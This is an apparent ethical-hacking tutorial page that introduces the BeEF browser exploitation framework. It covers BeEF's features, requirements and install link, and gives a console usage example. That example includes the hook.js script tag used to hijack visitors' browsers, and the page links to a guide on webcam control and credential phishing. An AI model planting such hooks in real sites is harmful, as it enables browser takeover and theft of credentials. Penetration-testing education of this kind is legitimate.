<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
fieldset {
  background-color: #eeeeee;
  width: 90%; 
   font-size:14px;       
    
}
r {
  background-color: silver;
  font-size: 19px;
  width: 100%;
   }
n  {
     font-size: 20px;
     }

* {
  box-sizing: border-box;
}

/* Add a gray background color with some padding */
body {
    font-family: 'Lexend Deca', sans-serif;
  padding: 20px;
  margin: 0;
        width: 100%;
        height: 20vh;
        background: linear-gradient(-45deg, #ee7752, #e73c7e, #23a6d5, #23d5ab);
        background-size: 300% 200%;
        -webkit-animation: gradientBG 15s ease infinite;
        animation: gradientBG 15s ease infinite
}

img {
  max-width: 100%;
  height: auto;
}

/* Header/Blog Title */
.header {
  padding: 2px;
  font-size: xx-small;
  text-align: center;
  background: white;
  margin: 0;
        width: 100%;
        height: 15vh;
        background: linear-gradient(-45deg, #ee7752, #e73c7e, #23a6d5, #23d5ab);
        background-size: 300% 200%;
        -webkit-animation: gradientBG 15s ease infinite;
        animation: gradientBG 15s ease infinite
}

@-webkit-keyframes gradientBG {
        0% {
            background-position: 0 50%
        }
        50% {
            background-position: 100% 50%
        }
        100% {
            background-position: 0 50%
        }
    }

    @keyframes gradientBG {
        0% {
            background-position: 0 50%
        }
        50% {
            background-position: 100% 50%
        }
        100% {
            background-position: 0 50%
        }
    }

/* Create two unequal columns that floats next to each other */
/* Left column */
.leftcolumn {   
  float: left;
  width: 75%;
  background: #ffffff;
}

/* Right column */
.rightcolumn {
  float: left;
  width: 25%;
  padding-left: 20px;
}

/* Fake image */
.fakeimg {
  background-color: #aaa;
  width: 100%;
  padding: 20px;
}

/* Add a card effect for articles */
.card {
   background-color: white;
   padding: 20px;
   margin-top: 20px;
}

/* Clear floats after the columns */
.row:after {
  content: "";
  display: table;
  clear: both;
}

/* Footer */
.footer {
  padding: 20px;
  text-align: center;
  background: #ddd;
  margin-top: 20px;
  margin: 0;
        width: 100%;
        height: 15vh;
        background: linear-gradient(-45deg, #ee7752, #e73c7e, #23a6d5, #23d5ab);
        background-size: 300% 200%;
        -webkit-animation: gradientBG 15s ease infinite;
        animation: gradientBG 15s ease infinite
}

.frame-area {
  display: block;
  background: #f1f1f1;
  width: 100%;  /* RESPONSIVE WIDTH */
  max-width: auto;
  height: 750px;
  overflow: hidden;  /* EDIT TO hidden FOR NO SCROLLBAR */
  border: #999999 1px solid;
  margin: 0px;
  padding: 0px;
  }


/* Responsive layout - when the screen is less than 800px wide, make the two columns stack on top of each other instead of next to each other */
@media screen and (max-width: 800px) {
  .leftcolumn, .rightcolumn {   
    width: 100%;
    padding: 0;
  }
}
</style>
</head>
<body>

<div class="header">
  <a href="index.html"><img src="https://1.bp.blogspot.com/-tuZ2JeNu8TY/X2Gjn91qNQI/AAAAAAAAoQs/Yn_Ij5cLcp8qrFL1nPMipYGMXljXOmkBQCK4BGAYYCw/s1600/ronnie.png" class=" square responsive-img materialboxed"></a>
</div>

<div class="row">
  <div class="leftcolumn" >

<ul>



	<center><h1>BeEF</h1></center>

	<center><img src="https://1.bp.blogspot.com/-i4QNnYPE91g/X7vu9AcpNnI/AAAAAAAApDE/Wuc_QvPtUqwyNN9UEt-QDLFQ12yWALGBgCLcBGAsYHQ/s320/img-beef.jpg" height="500" width="700"/></center>
<br>

	<p><span style="white-space: pre;">	</span>The <n>Browser Exploitation Framework (BeEF)</n> is a powerful and intuitive security tool. BeEF is pioneering techniques that provide penetration testers with practical client&ndash;side attack vectors. Unlike other security frameworks, BeEF focuses on leveraging browser vulnerabilities to assess the security posture of a target. This project is developed solely for lawful research and penetration testing.</p>

	<p><span style="white-space: pre;">	</span>BeEF hooks one or more web browsers to the application for the launching of directed command modules. Each browser is likely to be within a different security context, and each context may provide a set of unique attack vectors. The framework allows the penetration tester to select specific modules (in real&ndash;time) to target each browser, and therefore each context.</p>

	<p><span style="white-space: pre;">	</span>The framework contains numerous command modules that employ BeEF&#39;s simple and powerful API. This API is at the heart of the framework&#39;s effectiveness and efficiency. It abstracts complexity and facilitates quick development of custom modules.</p>


<h2>Features :</h2>

<ul style="list-style-type: disc">
    <p><li> Web and console UI</p>
    <p><li> Metasploit integration</p>
    <p><li> Modular structure</p>
    <p><li> Interprocess communication &amp; exploitation</p>
    <p><li> History gathering and intelligence</p>
    <p><li> Host and network reconnaissance</p>
    <p><li> Ability to detect browser plugins</p>
</ul>
<br>

<ul>
<h3>BeEF requirements :</h3>
<ul>
    <p><li> OS : Mac OS X 10.5.0 or higher / modern Linux</p>
    <p><li> Ruby 2.3 or newer</p>
    <p><li> SQLite 3.x</p>
    <p><li> Node.js 6 or newer</p>
</ul></ul>

<h2>Download and Installation guide :</h2>
	 <p>&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;<a href="https://github.com/beefproject/beef/wiki/Installation"><img src="https://1.bp.blogspot.com/-MnH0fiNcMsQ/X7vqPk8TvtI/AAAAAAAApBE/7CRUng7xPV4cQbWaVz1zknpG6zL1PBzfgCLcBGAsYHQ/s0/Click-Here.png" height="200" width="200"/></a></p>


<h2>BeEF Usage Example :</h2>
	
	<fieldset>	
	<code

	<p>root@kali:~# beef&ndash;xss</p>
	<p>[*] Please wait for the BeEF service to start.</p>
	<p>[*]</p>
	<p>[*] You might need to refresh your browser once it opens.</p>
	<p>[*]</p>
	<p>[*]  Web UI: http://127.0.0.1:3000 /ui/panel</p>
	<p>[*]    &nbsp;&nbsp;Hook: &lt;script src = <q>http:// &lt;IP&gt;:3000 /hook.js</q>&gt; &lt;/script&gt;</p>
	<p>[*] Example: &lt;script src = <q>http:// 127.0.0.1:3000 /hook.js</q>&gt; &lt;/script&gt;</p>
		<br>
	<p>● beef&ndash;xss.service - LSB: BeEF</p>
	   <p>&nbsp;Loaded: loaded (/etc/init.d /beef-xss; generated)</p>
	   <p>&nbsp;Active: active (running) since Sat 2018-11-24 18:44:53 EST; 5s ago</p>
	     <p>&nbsp;&nbsp;Docs: man:systemd-sysv -generator(8)</p>
	  <p>Process: 3457 ExecStart=/etc /init.d/beef-xss start (code=exited, status=0/SUCCESS)</p>
 	   <p>&nbsp;&nbsp;Tasks: 5 (limit: 4665)</p>
 	  <p>&nbsp;Memory: 151.9M</p>
  	 <p>&nbsp;CGroup: /system.slice/ beef-xss.service</p>
  	         <p>&emsp;&emsp;&emsp;&emsp;&emsp;└─3463 ruby /usr/share /beef-xss/beef</p>
		<br>
	<p>Nov 24 18:44:53 kali systemd[1]: Starting LSB: BeEF...</p>
	<p>Nov 24 18:44:53 kali systemd[1]: Started LSB: BeEF.</p>
		<br>
	<p>[*] Opening Web UI (http://127.0.0.1:3000 /ui/panel) in: 5... 4... 3... 2... 1...</p>

	</code>
	</fieldset>

<br>

<center><img src="https://1.bp.blogspot.com/-m_hmtttBQ6g/X7vu9JBIvlI/AAAAAAAApDI/kSFTs245yp8I5KpmWeDREknajEEedVxoQCLcBGAsYHQ/s320/img1-beef.png" height="500" width="800"/></center>

<br><br>
<p><n>If you want guide about <b>Hack Web Browsers with BeEF to Control Webcams, Phish for Credentials & More  :</b> <a href="https://null-byte.wonderhowto.com/how-to/hack-web-browsers-with-beef-control-webcams-phish-for-credentials-more-0159961/">Click Here</a></n></p>

<br>
<p><n>If you want <q>Video</q> about <b>BeEF Browser Exploitation :</b> <a href="https://youtu.be/BzepbzdIoGc">Click Here</a></n></p>
<br><br>

Source : <a href="https://tools.kali.org/exploitation-tools/beef-xss">kali.org</a>	



</ul>
	
    
  </div>
  
  <div class="rightcolumn">
    <div class="card">
      <h2>About us</h2>
      <p>free ethical hacking course for an enthusiast to learn ethical hacking from begginner to intermediate, By <a href="https://techdogie.blogspot.com/">Techdogie</a> team.</p>
    </div>
    <div class="card">
      <h3>Follow us</h3>
      <p><a href="https://techdogie.blogspot.com/">Techdogie</a></p>
    </div>
  </div>
</div>
<div class="footer">
  <h2> <a href="index.html">Home</a></h2>
</div>
</body>
</html>